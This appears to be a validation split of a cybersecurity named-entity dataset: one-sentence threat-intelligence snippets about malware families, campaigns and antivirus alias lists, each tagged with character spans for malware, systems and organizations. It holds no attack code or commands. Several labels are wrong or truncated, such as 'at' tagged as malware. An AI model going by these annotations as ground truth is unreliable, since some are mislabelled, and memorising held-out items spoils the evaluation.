{"text": "XLoader Disguises as Android Apps , Has FakeSpy Links This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices .", "spans": {"Malware: XLoader": [[0, 7], [63, 70]], "System: Android": [[21, 28], [107, 114]], "Malware: FakeSpy": [[40, 47]], "System: iOS": [[146, 149]], "System: iPhone": [[168, 174]], "System: iPad": [[179, 183]]}, "info": {"id": "cyner2_valid_001210", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Bladabindi.G3 Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_BLADABI.SMC MSIL.Trojan-Spy.Keylogger.I Backdoor.MSIL.Bladabindi.FQ Worm.Bladabindi.Win32.9249 BKDR_BLADABI.SMC Trojan-Dropper.Win32.Injector Backdoor:MSIL/Aataki.A Msil.Worm.Bladabindi.Pgcz Trojan.Krypt!krAm56VQrho MSIL/SpyPSW.AVQ!tr Win32/Trojan.e11", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001212", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Heur.FU.EC2AF0 Win32.Trojan.WisdomEyes.16070401.9500.9966 Backdoor.Trojan Win.Worm.FlyStudio-20 Trojan-Clicker.Win32.Flyst.ko Trojan.Win32.FlySky.cvcco Worm.Win32.Flystudio.18944 TrojWare.Win32.FlyStudio.~UJ Trojan.FlySky.13 TrojanClicker.Flyst.dm TrojanClicker:Win32/Yumud.A Trojan-Clicker.Win32.Flyst.ko Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001213", "source": "cyner2_valid"}}
{"text": "Finally, some of the recent CloudDuke spear-phishing campaigns have born a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.", "spans": {"Malware: CloudDuke": [[28, 37]], "Malware: CozyDuke": [[99, 107]]}, "info": {"id": "cyner2_valid_001214", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.MSIL Trojan-Ransom.Win32.Blocker.ick Trojan.Win32.Blocker.bgboef Trojan.KillProc.19469 BehavesLike.Win32.Trojan.cc TR/Zusy.23029.3 Trojan:Win32/Kurei.A Trojan/Win32.Blocker Win32.Trojan.Blocker.dkfj Trojan-Ransom.MSIL W32/Blocker.ICK!tr LockScreen.AN", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001215", "source": "cyner2_valid"}}
{"text": "The Hellsing APT group is currently active in the APAC region, hitting targets mainly in the South China Sea area, with a focus on Malaysia, the Philippines and Indonesia.", "spans": {}, "info": {"id": "cyner2_valid_001216", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Remokil Riskware.Win32.Killer.cysdud Trojan.Win32.Z.Remokil.69632 Tool.Killer BehavesLike.Win32.Dropper.km BDS/Remokil.A.2 Backdoor:Win32/Remokil.A Trj/CI.A Backdoor.Remokil!tnG0oKXIw5k W32/BackDoor.1YP!tr Win32/Backdoor.709", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001217", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Bdaejec.A.mue Win32.Trojan.KillAV.c Backdoor.Trojan Win32/Downloader.QRedDl_i Backdoor.Win32.Ciadoor.dgu Trojan.Win32.Ciadoor.dqnhik Trojan.StartPage.56147 BehavesLike.Win32.Dropper.dc Exploit.Win32.ShellCode Trojan[Backdoor]/Win32.Ciadoor Backdoor.Win32.Ciadoor.dgu Backdoor:Win32/Bdaejec.A Trojan/Win32.Yoddos.C209363 Backdoor.Ciadoor Backdoor.Ciadoor!PoWyk0Y7Hyg", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001218", "source": "cyner2_valid"}}
{"text": "Karagany is used by a number of groups, so the attribution here is weak.", "spans": {"Malware: Karagany": [[0, 8]]}, "info": {"id": "cyner2_valid_001219", "source": "cyner2_valid"}}
{"text": "Threat actors salivate at the thought of an increased volume of credit and debit card transactions flowing through endpoints they have compromised with card-stealing malware.", "spans": {"Malware: at": [[23, 25]], "Malware: card-stealing malware.": [[152, 174]]}, "info": {"id": "cyner2_valid_001220", "source": "cyner2_valid"}}
{"text": "A backdoor targetting Linux also known as: HEUR:HackTool.Linux.XHide.a Trojan.XHide.exrowv Linux.Hacktool.Prochide.Wkbo Tool.Linux.ProcHide.22 ELF/Trojan.IDGF-0 HackTool.Linux.jt HackTool/Linux.XHide.a Hacktool.Linux.Xhide!c HEUR:HackTool.Linux.XHide.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001221", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Hacktool.Ofstar.A W32/Tool.ZAWB-1617 HackTool.Win32.Ofstar.a Trojan.Hacktool.Ofstar.A Trojan.Win32.Ofstar.dczxtl Trojan.Hacktool.Ofstar.A Trojan.Hacktool.Ofstar.A Trojan.Click.17767 Tool.Ofstar.Win32.2 W32/VirTool.AVK HackTool/Win32.Ofstar Win32.HackTool.Ofstar.a.kcloud HackTool:Win32/Ofstar.A Trojan.Hacktool.Ofstar.A HackTool.Win32.Ofstar.a Trojan.Hacktool.Ofstar.A Trojan.Hacktool.Ofstar.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001222", "source": "cyner2_valid"}}
{"text": "The program can redirect incoming calls to the phone numbers of cybercriminals.", "spans": {"Malware: program": [[4, 11]]}, "info": {"id": "cyner2_valid_001223", "source": "cyner2_valid"}}
{"text": "Port 6206 : Skype extraction service .", "spans": {"System: Skype": [[12, 17]]}, "info": {"id": "cyner2_valid_001224", "source": "cyner2_valid"}}
{"text": "This discovery indicates the actor ’ s ambition in expanding operations into Google Play store with previous success experience from the main “ Agent Smith ” campaign .", "spans": {"System: Google Play": [[77, 88]], "Malware: Agent Smith": [[144, 155]]}, "info": {"id": "cyner2_valid_001225", "source": "cyner2_valid"}}
{"text": "The malware reached a global spread, infecting mostly users from south-east Asia, but also over 280,000 users in the US.", "spans": {"Malware: malware": [[4, 11]], "Organization: users": [[104, 109]]}, "info": {"id": "cyner2_valid_001227", "source": "cyner2_valid"}}
{"text": "Swearing Trojan's name comes from Chinese swear words found inside the malware's code.", "spans": {"Malware: Swearing Trojan's": [[0, 17]], "Malware: the malware's code.": [[67, 86]]}, "info": {"id": "cyner2_valid_001228", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware11 Trojan.Obfuscated.MQ Trojan.Obfuscated.MQ Downloader.RtkDL.Win32.588 Trojan.Obfuscated.MQ Win32.Rootkit.Koutodoor.a W32/Downldr2.FEHJ Trojan.Farfli RTKT_KTDOOR.SMIA Trojan.Obfuscated.MQ Trojan.Obfuscated.MQ Trojan.Win32.RtkDL.bfwayn Trojan.Win32.Downloader.29664.B Troj.Downloader.W32.RtkDL.l6Y8 Trojan.Obfuscated.MQ Trojan.Obfuscated.MQ Adware.Baidu.875 RTKT_KTDOOR.SMIA BackDoor-DTL.sys Trojan.Rootkit TrojanDownloader.RtkDL.tx Trojan[Downloader]/Win32.RtkDL Trojan:WinNT/Koutodoor.A Trojan/Win32.Xema.C26785 BackDoor-DTL.sys", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001229", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Concon.A Trojan.Win32.Concon!O Trojan.Concon.A Trojan.Concon.A Trojan.Win32.Hesv.bznw Trojan.Concon.A Heur.Packed.Unknown Trojan.Concon.A Trojan/Win32.Concon Trojan.Concon.A Trojan.Win32.Hesv.bznw Trojan:Win32/Concon.C Trojan.Concon.A Win32.Trojan.Concon.Hwmo Trojan.Concon!EDvZbBUGNm0 Trojan.Concon W32/Dx.VVF!tr Win32/Trojan.ee5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001230", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.WesboaHAH1.Worm Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Trojan.LCZO-3767 Win.Trojan.Pasmu-203 Trojan.Win32.Pasmu.sdcc Trojan.Win32.Pasmu.58368 TrojWare.Win32.PSW.Delf.~JHN Trojan.PWS.Gootkit.2 BehavesLike.Win32.VTFlooder.qh Trojan.Win32.Pasmu Trojan/Pasmu.bs Win32.PSWTroj.Undef.kcloud Trojan.Heur.FU.EDD95C Trj/CI.A Win32/Trojan.BO.9fe", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001231", "source": "cyner2_valid"}}
{"text": "The malware exfiltrates the collected account data directly to an external Command and Control C2 Server in Eastern Europe, but unusually the communications utilise raw TCP sockets rather than the HTTP protocol that has become the norm in POS malware.", "spans": {"Malware: malware": [[4, 11]], "Malware: POS malware.": [[239, 251]]}, "info": {"id": "cyner2_valid_001232", "source": "cyner2_valid"}}
{"text": "AresLoader is a new loader malware-as-a-service MaaS offered by threat actors with links to Russian hacktivism that was spotted recently in the wild.", "spans": {"Malware: AresLoader": [[0, 10]], "Malware: new loader malware-as-a-service MaaS": [[16, 52]]}, "info": {"id": "cyner2_valid_001233", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Buterat Trojan.Downloader Adware.Liuliangbao.Win32.10 Trojan.Mikey.DF455 not-a-virus:AdWare.Win32.Liuliangbao.by Riskware.Win32.Liuliangbao.erwbnw Trojan.DownLoader25.5364 GrayWare[AdWare]/Win32.Liuliangbao Backdoor:Win32/Buterat.C!bit not-a-virus:AdWare.Win32.Liuliangbao.by PUP/Win32.Liuliangbao.C2086918 AdWare.Liuliangbao PUA.Liuliangbao! PUA.Liuliangbao Trj/GdSda.A Win32/Trojan.719", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001234", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Welchia.Worm Net-Worm.Win32.Welchia!O W32.Nachi W32/Nachi.worm.a W32/Nachi.worm.a Win32.Worm.Rbot.a W32/Nachi.A W32.Welchia.Worm Win32/Nachi.A WORM_NACHI.H Win.Worm.Blaster-4 Net-Worm.Win32.Welchia.s Trojan.Win32.Welchia.oxhi Worm.Win32.Welchia.10240.B W32.W.Welchia.l7FB Win32.HLLW.LoveSan.2 Worm.Welchia.Win32.1 WORM_NACHI.H BehavesLike.Win32.Backdoor.mh Net-Worm.Win32.Welchia W32/Nachi.GTED-3671 WORM/Nachi.A.1 Worm[Net]/Win32.Welchia Worm:Win32/Nachi.A Net-Worm.Win32.Welchia.s Net-Worm.Welchia W32/Nachi.M.worm I-Worm.Nachi.A Win32/Nachi.A Worm.Win32.Nachi W32/Nachi.A!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001235", "source": "cyner2_valid"}}
{"text": "The attachment in this campaign is a malicious zip file containing malicious obfuscated JavaScript.", "spans": {"Malware: malicious zip file": [[37, 55]], "Malware: malicious obfuscated JavaScript.": [[67, 99]]}, "info": {"id": "cyner2_valid_001237", "source": "cyner2_valid"}}
{"text": "This same infection chain has been utilized in the past to infect computers with the Dridex banking Trojan and Jaff's predecessor, Locky ransomware.", "spans": {"System: computers": [[66, 75]], "Malware: Dridex banking Trojan": [[85, 106]], "Malware: Jaff's": [[111, 117]], "Malware: Locky ransomware.": [[131, 148]]}, "info": {"id": "cyner2_valid_001238", "source": "cyner2_valid"}}
{"text": "Unit 42 has recently discovered a new variant of PowerWare, also known as PoshCoder, imitating the popular Locky ransomware family.", "spans": {"Organization: Unit 42": [[0, 7]], "Malware: new variant": [[34, 45]], "Malware: PowerWare,": [[49, 59]], "Malware: PoshCoder,": [[74, 84]], "Malware: Locky ransomware family.": [[107, 131]]}, "info": {"id": "cyner2_valid_001239", "source": "cyner2_valid"}}
{"text": "In fact, our team considers them some of the best adversaries out of all the numerous nation-state, criminal and hacktivist/terrorist groups we encounter on a daily basis.", "spans": {"Organization: team": [[13, 17]]}, "info": {"id": "cyner2_valid_001240", "source": "cyner2_valid"}}
{"text": "The URLs — abused as part of XLoader ’ s C & C — are hidden in three webpages , and the C & C server that XLoader connects to differ per region .", "spans": {"Malware: XLoader": [[29, 36], [106, 113]]}, "info": {"id": "cyner2_valid_001241", "source": "cyner2_valid"}}
{"text": "Operation Pawn Storm is a campaign known to target military, embassy, and defense contractor personnel from the United States and its allies.", "spans": {"Organization: military, embassy,": [[51, 69]], "Organization: defense contractor personnel": [[74, 102]]}, "info": {"id": "cyner2_valid_001242", "source": "cyner2_valid"}}
{"text": "Even though this is not a traditional remote access tool ( RAT ) , this campaign seems to target mainly private users .", "spans": {}, "info": {"id": "cyner2_valid_001243", "source": "cyner2_valid"}}
{"text": "These are related to the malware Naoinstalad", "spans": {"Malware: the malware Naoinstalad": [[21, 44]]}, "info": {"id": "cyner2_valid_001244", "source": "cyner2_valid"}}
{"text": "During testing we were able to generate a number of proof-of-concept PoC documents both with and without a prompt to the user.", "spans": {}, "info": {"id": "cyner2_valid_001245", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.ThasoticLTAA.Trojan Trojan/Seeav.i Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Dwn.doicqs Win32.Worm.Small.Loif Trojan.DownLoader12.19458 Worm.Seeav.Win32.1 BehavesLike.Win32.Ransomware.fc TR/Crypt.Xpack.123006 Worm/Win32.Small Trojan:Win32/Seeav.B Win32/Seeav.I Worm.Win32.Seeav Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001246", "source": "cyner2_valid"}}
{"text": "The attack has affected users browsing to many popular sites, including CNN Indonesia, the official website of Prague Airport, Detik, AASTOCKS, RTL Television Croatia, and the Bejewled Blitz game on Facebook.", "spans": {"Organization: CNN": [[72, 75]], "Organization: Detik, AASTOCKS, RTL Television": [[127, 158]], "Organization: the Bejewled Blitz game": [[172, 195]], "Organization: Facebook.": [[199, 208]]}, "info": {"id": "cyner2_valid_001248", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Bitmin.alk BehavesLike.Win32.Trojan.hh Trojan.Win32.Macultum TrojanDownloader.Bitmin.bq Trojan-Downloader.Win32.Bitmin.alk Trojan/Win32.Dropper.C237486 Win32.Trojan-downloader.Bitmin.Eflh W32/Bitmin.ALK!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001249", "source": "cyner2_valid"}}
{"text": "After obtaining a sample from this attack and conducting further analysis, we found that the attackers have been using the same payload and just altering its configurations in attacks since March of this year.", "spans": {"Malware: payload": [[128, 135]]}, "info": {"id": "cyner2_valid_001250", "source": "cyner2_valid"}}
{"text": "At other times , Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant .", "spans": {"Malware: Bread": [[17, 22]]}, "info": {"id": "cyner2_valid_001252", "source": "cyner2_valid"}}
{"text": "New samples of targeted malware primarily seen in the Middle East.", "spans": {"Malware: malware": [[24, 31]]}, "info": {"id": "cyner2_valid_001253", "source": "cyner2_valid"}}
{"text": "thought to be associated with targeted malware.", "spans": {"Malware: malware.": [[39, 47]]}, "info": {"id": "cyner2_valid_001255", "source": "cyner2_valid"}}
{"text": "The group also continues to focus on theft of code signing certificates and internal documentation, including company files and internal communication history chats/emails.", "spans": {"Organization: The group": [[0, 9]]}, "info": {"id": "cyner2_valid_001256", "source": "cyner2_valid"}}
{"text": "TrendMicro has noticed a recent increase in TorrentLocker-related emails being sent to users in several countries, particularly the United Kingdom and Turkey.", "spans": {"Organization: TrendMicro": [[0, 10]]}, "info": {"id": "cyner2_valid_001257", "source": "cyner2_valid"}}
{"text": "We have followed the activities of this botnet for several months and during our investigations we found some versions of a Windows fork of the malware.", "spans": {"Malware: botnet": [[40, 46]], "System: Windows": [[124, 131]], "Malware: malware.": [[144, 152]]}, "info": {"id": "cyner2_valid_001258", "source": "cyner2_valid"}}
{"text": "During the past week, US users visiting adult-themed sites were targeted by ads for a fake PornHub app that contained a version of the Koler ransomware.", "spans": {"Organization: US users": [[22, 30]], "Malware: the Koler ransomware.": [[131, 152]]}, "info": {"id": "cyner2_valid_001259", "source": "cyner2_valid"}}
{"text": "A possible attack scenario involves replacing legitimate apps with repackaged or malicious versions .", "spans": {}, "info": {"id": "cyner2_valid_001260", "source": "cyner2_valid"}}
{"text": "Once it infects a device , Wroba behaves very aggressively .", "spans": {"Malware: Wroba": [[27, 32]]}, "info": {"id": "cyner2_valid_001261", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Vetor.PE Trojan.Win32.Farfli.1!O W32.Virut.G Backdoor.Xyligan BKDR_SMALL.LDI W32.Virut.CF Win32/Virut.17408 Win.Trojan.Xyligan-19 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Backdoor.Win32.Bdx.e Win32.Virut.56 BehavesLike.Win32.Virut.cc Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.cr.61440 Backdoor:Win32/Xyligan.A Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.13 Win32/Virut.NBP Backdoor.Win32.Xyligan W32/Sality.AO Virus.Win32.VirutChangeCall.J", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001262", "source": "cyner2_valid"}}
{"text": "In Russia , some major banks offer their clients a special service that allows them to transfer money from their bank card to their mobile phone account .", "spans": {}, "info": {"id": "cyner2_valid_001263", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanDownloader.Tearsp.AA2 Downloader.Small.Win32.37323 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.A.Downloader.15980 TrojWare.Win32.TrojanDownloader.Small.F BehavesLike.Win32.Fareit.mt Trojan[Downloader]/Win32.Small Downloader/Win32.Small.R5459 Bck/Unilink.B Trojan.Win32.StartPage.c Trojan.Sisron!oYYxWSE+/gw", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001264", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Kryptik.Win32.764268 Trojan/Kryptik.fy Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.PassView.dhxqtk Tool.PassView.638 Trojan-Dropper.Win32.Injector TrojanDropper.Injector.alvo TR/Keylogger.AY Trojan[Dropper]/Win32.Injector Win32.HeurC.KVM007.a.kcloud Trojan/Win32.Spnr.R38927 Trojan.Kryptik!I/Y93lnQFpU", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001265", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.QearadG.Trojan Trojan.Mauvaise.SL1 Trojan.Graftor.D451F3 Win32.Trojan.WisdomEyes.16070401.9500.9986 TROJ_SACTO.C Trojan.Win32.FakeFolder.bk Trojan.DownLoader21.61435 Trojan.FakeFolder.Win32.217 TROJ_SACTO.C Trojan.Win32.Urelas W32/Trojan.EMXX-4272 Trojan.FakeFolder.a Trojan:Win32/Sacto.B!bit Trojan.Win32.FakeFolder.bk HEUR/Fakon.mwf Trojan.FakeFolder Win32.Trojan.Fakefolder.Pcsn Trojan.Sacto!tCZ0BN8/xSI", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001266", "source": "cyner2_valid"}}
{"text": "From there , root-level apps can read or modify data and resources that would be off-limits to normal apps .", "spans": {}, "info": {"id": "cyner2_valid_001267", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Dropper.FrauDrop.bkr Trojan.Fbphotofake.C W32/MalwareF.TPKK Trojan.ADH.2 TROJ_SPNR.04CG11 Trojan-Dropper.Win32.FrauDrop.cmn TROJ_SPNR.04CG11 TrojanDropper.FrauDrop.vm TrojanDownloader:Win32/Fraudload.H W32/MalwareF.TPKK Dropper/Win32.FrauDrop TrojanDropper.FrauDrop.bke Trojan.ADH Cryptic.BHN Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001268", "source": "cyner2_valid"}}
{"text": "Drive-by downloads and multiple rooting exploits The malware uses a variety of methods to infect devices .", "spans": {}, "info": {"id": "cyner2_valid_001269", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.HPZR Trojan.Win32.Pakes W32/Trojan.DMTA-2040 Trojan.Zusy.D1FEBC Trojan:Win32/Rotker.A TScope.Malware-Cryptor.SB W32/Rootkit.J!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001270", "source": "cyner2_valid"}}
{"text": "This gives users a chance to see details and better understand any changes made .", "spans": {}, "info": {"id": "cyner2_valid_001271", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Androm BKDR_ANDROM.THAOBFK Win32.Trojan.WisdomEyes.16070401.9500.9998 BKDR_ANDROM.THAOBFK Backdoor.Win32.Androm.oytg Trojan.Win32.Androm.exkqhv Trojan.Win32.Z.Androm.409600 Backdoor.W32.Androm!c Trojan.PWS.Stealer.17779 BehavesLike.Win32.Packed.gt Trojan.VB.Crypt Backdoor.Androm.wjy TR/Dropper.VB.quwvl Trojan[Backdoor]/Win32.Androm Backdoor.Win32.Androm.oytg Trojan/Win32.VBKrypt.R219198 TScope.Trojan.VB Trojan.PasswordStealer Trj/GdSda.A Win32.Trojan.Inject.Auto Malicious_Behavior.SB", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001272", "source": "cyner2_valid"}}
{"text": "Local and Remote Shells In order to execute commands on the infected devices , as well as to provide a reverse shell to the Command & Control operators , Exodus Two immediately attempts to execute a payload it downloads with the name null .", "spans": {"Malware: Exodus Two": [[154, 164]]}, "info": {"id": "cyner2_valid_001273", "source": "cyner2_valid"}}
{"text": "When root privilege is gained , a shell backdoor and malicious RCSAndroid agent APK file will be installed The second method is to use a stealthy backdoor app such as ANDROIDOS_HTBENEWS.A , which was designed to bypass Google Play .", "spans": {"Malware: RCSAndroid": [[63, 73]], "Malware: ANDROIDOS_HTBENEWS.A": [[167, 187]], "System: Google Play": [[219, 230]]}, "info": {"id": "cyner2_valid_001274", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Razy.D3BFAF Win32.Trojan.WisdomEyes.16070401.9500.9999 TrojWare.MSIL.Golroted.EJU BehavesLike.Win32.Trojan.jc Trojan.MSIL.Inject Win-Trojan/MSILKrypt03.Exp", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001276", "source": "cyner2_valid"}}
{"text": "The vulnerability lies in a logical bug, which enables an attacker with write-only access to a share to load a malicious samba module and execute arbitrary code.", "spans": {"Vulnerability: vulnerability": [[4, 17]], "Vulnerability: logical bug,": [[28, 40]], "Vulnerability: write-only access": [[72, 89]], "Malware: malicious samba module": [[111, 133]], "Malware: execute arbitrary code.": [[138, 161]]}, "info": {"id": "cyner2_valid_001277", "source": "cyner2_valid"}}
{"text": "The emails all highlighted the successful delivery of a package, which can be tracked by simply clicking on a link.", "spans": {}, "info": {"id": "cyner2_valid_001278", "source": "cyner2_valid"}}
{"text": "For the past two and a half months, a WordPress plugin named Display Widgets has been used to install a backdoor on WordPress sites across the Internet.", "spans": {"Malware: WordPress plugin named Display Widgets": [[38, 76]], "Malware: backdoor": [[104, 112]]}, "info": {"id": "cyner2_valid_001280", "source": "cyner2_valid"}}
{"text": "While researching the network infrastructure related to PoSeidon malware, Damballa was able to find information related to this campaign and its operators.", "spans": {"System: network infrastructure": [[22, 44]], "Malware: PoSeidon malware,": [[56, 73]], "Organization: Damballa": [[74, 82]]}, "info": {"id": "cyner2_valid_001281", "source": "cyner2_valid"}}
{"text": "The report exposes the targets, tools, and attack techniques, and provides full details on the Lotus Blossom campaign, including all indicators of compromise.", "spans": {"Malware: tools,": [[32, 38]]}, "info": {"id": "cyner2_valid_001282", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Application.Tool.3596 Packed.Win32.PePatch!O Application.Tool.DE0C Win32.Trojan-Dropper.Binder.h W32/Trojan.EPIY-8359 Spyware.Ardakey Trojan.Win32.Hesv.coag Application.Tool.3596 Trojan.Win32.PcClient.dleljw Backdoor.W32.Rbot.lBP9 Application.Tool.3596 Program.Ardamax.772 BehavesLike.Win32.Backdoor.mm W32/TrojanX.BMPY TrojanSpy.Ardamax.sj Trojan.Win32.Hesv.coag HEUR/Fakon.mwf TrojanSpy.Ardamax TrojanSpy.Ardamax!dK0E+xHhPvU Backdoor.Win32.PcClient Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001283", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware11 Trojan.Win32.Pincav!O Trojan.Enfal TROJ_DYER.BMC Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/MalwareF.HHES Backdoor.Trojan TROJ_DYER.BMC Win.Trojan.Enfal-50 Trojan.Win32.Pincav.ypz Trojan.Win32.Pincav.bxbuzi Trojan.Win32.Z.Pincav.57344.P Troj.W32.Pincav!c BackDoor.Tiblue.25 Trojan.Pincav.Win32.8014 W32/Risk.IONL-8174 Trojan/Pincav.eot W32/Pincav.GRW!tr Trojan/Win32.Pincav Trojan.DarkHotel.18 Trojan.Win32.Pincav.ypz Trojan:Win32/Enfal.H Trojan/Win32.Pincav.C89565 Win32.Trojan.Pincav.Alss Trojan.Pincav!xRC8VkZkT6w Win32/Trojan.c48", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001284", "source": "cyner2_valid"}}
{"text": "Although malware targeting the Android OS stopped being a novelty quite some time ago, this trojan is quite unique.", "spans": {"Malware: malware": [[9, 16]], "System: Android OS": [[31, 41]], "Malware: trojan": [[92, 98]]}, "info": {"id": "cyner2_valid_001285", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Bot.130848 Backdoor/W32.IRCBot.46080.X Backdoor.Codbot Backdoor.Codbot.Win32.70 Backdoor.W32.Codbot.ah!c Backdoor/Codbot.ah W32/Sdbot.LGX W32.Toxbot Win32/Toxbot.AP WORM_CODBOT.BA Win.Trojan.Codbot-25 Backdoor.Bot.130848 Backdoor.Win32.Codbot.ah Backdoor.Bot.130848 Trojan.Win32.Codbot.frjs Backdoor.Win32.CodBot.47104.F Backdoor.Bot.130848 Backdoor.Bot.130848 Win32.Detox.based WORM_CODBOT.BA BehavesLike.Win32.Downloader.pc Backdoor/Codbot.k WORM/Spybot.46080.4 Trojan[Backdoor]/Win32.Codbot Backdoor.Bot.D1FF20 Backdoor.Win32.Codbot.ah Backdoor:Win32/Codbot.AM Worm/Win32.IRCBot.C217036 Backdoor.Codbot-O Backdoor.Codbot Bck/Sdbot.ELC Backdoor.Codbot.DM Backdoor.Win32.Codbot.AH W32/SpyBot.ZI!dam", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001286", "source": "cyner2_valid"}}
{"text": "The end payload for this campaign is Cryptowall 3.0. Talos has covered this threat repeatedly and this is another example of how the success of Ransomware has pushed it to one of the top threats we are seeing today.", "spans": {"Malware: payload for": [[8, 19]], "Malware: Cryptowall 3.0.": [[37, 52]], "Organization: Talos": [[53, 58]], "Malware: threat": [[76, 82]], "Malware: Ransomware": [[144, 154]], "Malware: threats": [[187, 194]]}, "info": {"id": "cyner2_valid_001288", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.MSILPerseus.DDB45 Win32.Trojan.WisdomEyes.16070401.9500.9979", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001289", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.IRCBot.Win32.1711 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.IRCBot-2756 Backdoor.Win32.IRCBot.kzq Trojan.Win32.IRCBot.cwscme Backdoor.Win32.IRC.Bot.~RF Trojan.Mercur Backdoor/IRCBot.bmu Trojan[Backdoor]/Win32.IRCBot Win32.Hack.IRCBot.kcloud Backdoor.Win32.IRCBot.kzq Worm/Win32.IRCBot.C22556 Worm.Win32.Yoybot", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001290", "source": "cyner2_valid"}}
{"text": "Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related.", "spans": {}, "info": {"id": "cyner2_valid_001291", "source": "cyner2_valid"}}
{"text": "Several TXT files with commands on the attacker ’ s FTP server contain a victim identifier in the names that was probably added by the criminals : CMDS10114-Sun1.txt CMDS10134-Ju_ASUS.txt CMDS10134-Tad.txt CMDS10166-Jana.txt CMDS10187-Sun2.txt CMDS10194-SlavaAl.txt CMDS10209-Nikusha.txt Some of them sound like Russian names : Jana , SlavaAl , Nikusha .", "spans": {}, "info": {"id": "cyner2_valid_001292", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojWare.Win32.Rootkit.Hodprot.~v001 Trojan.WinSpy.985 Trojan:WinNT/Parchood.A Backdoor/Win32.Hodprot Backdoor.Sheedash", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001294", "source": "cyner2_valid"}}
{"text": "The shell backdoor then installs the RCSAndroid agent .", "spans": {"Malware: RCSAndroid": [[37, 47]]}, "info": {"id": "cyner2_valid_001295", "source": "cyner2_valid"}}
